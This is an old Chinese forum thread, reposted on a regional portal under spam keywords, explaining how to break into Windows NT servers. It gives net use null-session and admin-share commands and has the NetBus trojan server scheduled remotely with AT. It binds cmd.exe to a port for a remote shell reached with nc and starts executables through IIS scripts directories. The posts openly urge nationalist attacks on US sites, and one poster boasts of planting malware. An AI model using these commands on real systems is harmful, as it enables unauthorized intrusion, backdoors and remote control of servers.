亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区
汶上信息港
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
[打印本頁]
作者:
雜七雜八
時(shí)間:
2011-1-13 17:03
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
《版主頁黑客工具和文章的幾個(gè)問題》中提到:
. U+ C. v7 A7 G: l8 `
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運(yùn)行PINGER,設(shè)置好IP,點(diǎn)PING,彈出一個(gè)窗口(C++。。。),說出錯(cuò),然后關(guān)閉了,何故,是不是安裝有誤? 2。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平。
% a) Q& j* m$ c: u4 v- ?
> 我的機(jī)子MMX166,WIN98,2。5G,32M內(nèi)存。
" u- U+ a" i1 v5 y2 r/ R& L
) e% z; a8 e2 t# M7 Q" }
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具,就可以成功。
6 E: C" n1 |4 t9 X
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議,你一定要安裝NT,對于你的機(jī)器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤。
3 j+ G. ]; E% ^& ]! P
其實(shí),攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
8 K$ X& K1 x9 ^9 H* p6 D3 q
net use \\111.111.111.111\ipc$ "" /user:""
, t" p2 m. L X8 N# l# A/ ~( A/ S& o
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
% m, j6 v7 K6 x; y& H6 t+ A5 o
net view \\111.111.111.111
% h3 p' e. ]& s6 O! P
當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
z/ d8 g0 f: d9 D! ~ N: a
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
9 \, G1 y! a! f; c4 P/ k- P- E
命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
, x8 I( S# O: {# a( B; y g( J- h [
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
1 W7 N4 e2 c [# G/ k* ?
net use x: \\111.111.111.111\c$
- h/ j1 M4 r" x! M
net use y: \\111.111.111.111\d$
& y S# v# }1 O* u$ z) O5 [
這樣,目標(biāo)NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
3 c( d+ ?0 ^/ S& j* `# H* Q
2、管理目標(biāo)NT的用戶:
) h- {; P5 ^/ H2 S2 ^2 Q
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
/ w6 H8 A. a: G% i0 @9 o% h
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
2 B) O9 q6 E7 l c, Q
3、管理目標(biāo)NT的服務(wù)
& C# C- F2 t3 z) P; A8 ~0 A# m0 i
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
g0 g" r. Z+ ^/ L6 U
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
& ^) p) B7 {8 ~3 ]* [* k3 r
4、IIS管理
8 U" k$ d4 Y1 ~2 T
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
! A% J! M, ^3 d# G) y9 y( B
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
/ c* n, l9 g1 Y P7 C
5、事件管理
! h. i, `* n: S
“事件查看器”->連接到服務(wù)器->111.111.111.111
2 u" n# g# K, l# j ~( \
- q- v( |5 ~+ Q5 c3 V. r" a" y
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的。
- w: ]9 O, |5 O6 a* D
8 Z( v9 K5 O1 c. N
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
! ?/ l+ ~$ U% H- [9 J
net use \\111.111.111.111\ipc$
7 |$ E1 O& ^/ O4 o1 G
net use z: \\111.111.111.111\d$
8 o0 J; O4 V4 D8 O
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98,改用該用戶和密碼登錄,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理,如用戶、事件等
# i; P" T }( E
) q! h6 J; Q( @8 p4 r1 L" F: m2 ^
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國的站點(diǎn),花點(diǎn)時(shí)間,裝個(gè)NT吧,NT Workstation也可以!
I: L, J6 Z) A b: a8 p% O
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!
3 Y' _5 O* T% c) l
, b- U" ]( Y- A: [& g% P! P( ^
" z0 ^- r( A3 ^* {9 p" w5 s2 K
--------------------------------------------------------------------------------
, U& A* S3 H {
( n' ~1 A Y; J& X
>quack于1999-06-12,23:37:44
' H: r# \5 [7 g2 a, [$ T( N' i
在大作《幾個(gè)有關(guān)黑的問題》中提到:
3 q7 b. A5 J1 y* N
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!。
0 ?1 r; Q3 |& N0 ? k8 v
# R8 V' y0 q ~3 Y! o
killusa于1999-06-13,03:25:15
- k" J' k5 G2 A! o" t
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:
+ V, T! i( L6 C1 c! X0 I6 W. E) N5 c; ~
1 C& @ n; {) S' T3 V& e
letmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉
: {1 _3 k0 S% a. W" X
pinger程序,只是利用ping來尋找主機(jī),每臺NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP,而無主機(jī)名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會顯示主機(jī)名。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會出現(xiàn)上面的情況。
7 ~/ {( l$ {1 M/ H' |: c
- |/ a3 R9 c/ \3 N; r3 R. K$ ~
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以,netbus.exe是不用上傳的,只需在目的
5 p4 A! e" B4 G W! c
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
5 Q. ?9 K4 U* f4 u0 Z( G% |
% r6 a' O8 O" X# [0 G, ?
1、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
! L" G4 Y. Q/ c$ O
0 G x3 E1 Y! R7 O
C:\>net start schedule
: a: A* b. t0 h/ B
Schedule 正在啟動(dòng)服務(wù).....
5 x, S/ Q! n3 Z, o7 n u1 b& I
Schedulw 服務(wù)啟動(dòng)成功。
3 h# v' [6 `! y
C:\>at /?
/ Z- \, |5 j2 c2 Y
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
" M, T+ g% P* V: K0 W4 [4 G
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。
+ l# J$ K0 Y4 P* }* X' ]: ~
8 `+ Y4 g0 x. }6 r
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
1 E7 l* F/ Y% d5 p1 o* B* B
AT [\\computername] time [/INTERACTIVE]
- ?5 ], E3 `, I) i
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
3 \; w4 q: c, J5 g
. l4 Q% D' w3 |* d; ^* e
\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
: g- ~' \: S1 k1 W& k
命令會被排定在本機(jī)上運(yùn)行。
; N u5 U5 Y1 c j
id 指定給排定進(jìn)度命令的識別號。
9 m+ z3 _: A8 O' K. Q
: J( N4 |* W/ h2 w" f
/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會被刪除。
t: `3 F6 P7 u3 n2 T
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 。
+ ~& i: |+ m; c+ B
time 指定命令運(yùn)行的時(shí)間。
3 ^0 [& v) R: o: a6 {! t2 M9 ^6 ~
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過桌面交互。
0 H8 V3 T% W/ u, E# k! J) w; e
$ `' w& V8 s+ [2 m% M4 L- u% m' D
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
. k8 U% l# J' s1 {, ]
如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
$ c* T) w( `: {" J: \
* ~* \$ p+ N7 i& o5 Z3 K9 U J
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三),運(yùn)行命令。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
8 k$ M9 D* i3 Q1 k- U
* W& Y) S- N% k' p n8 ]
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。
, s7 M [# ?/ p. x) g( k% l, L1 w/ L
^5 X9 ^% G! k/ q+ V/ N4 k
C:\>
# Y. E2 F, V" B: O! F
. C2 C- E. B) E( J! `
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
7 ]# v8 b) _6 ?: f( I
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
7 w' @# ~9 t8 n# ^$ Y1 F* C+ Z
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
* _. J2 o# n$ T8 b7 B- v
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:
! k- ?( s+ ^& O1 |2 p* H7 _
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
1 O# J! L1 o! C% a
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量,等一會后,再在本地啟動(dòng)netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動(dòng)了,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
' J: v0 v2 F6 s# ^, r
Microsoft(R) Windows NT(TM)
7 c6 N) s# O# R/ I+ q: b2 I9 w* K
(C) Copyright 1985-1996 Microsoft Corp.
: l" b1 F% C+ K
C:\>
: c' x0 z. E: ~; U+ \8 w( G( k6 O! }5 ^
4 N5 d( P& f: m6 ^/ R& o
2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
# @, O; t; Y' q# F+ g; Q
# @5 V1 ^ {& \: _7 L- k
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
" L% {8 m' P: F3 R1 _* \. D4 ~. u
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
4 H. t; T. t T% O$ H
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
3 s; a: P! K! S( _; B5 E
該程序就啟動(dòng)了
% t% i$ K! E3 k9 N
# v% R, R: y4 O7 |+ m9 S2 B
我只提這幾中方法!
& k! i) p z1 l, y a- h9 E; O
要成功,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!
9 K2 F% C4 B Q) N; i: W
& }' u3 d7 D1 v
歡迎光臨 汶上信息港 (http://m.loveproblemguru.com/)
Powered by Discuz! X3.5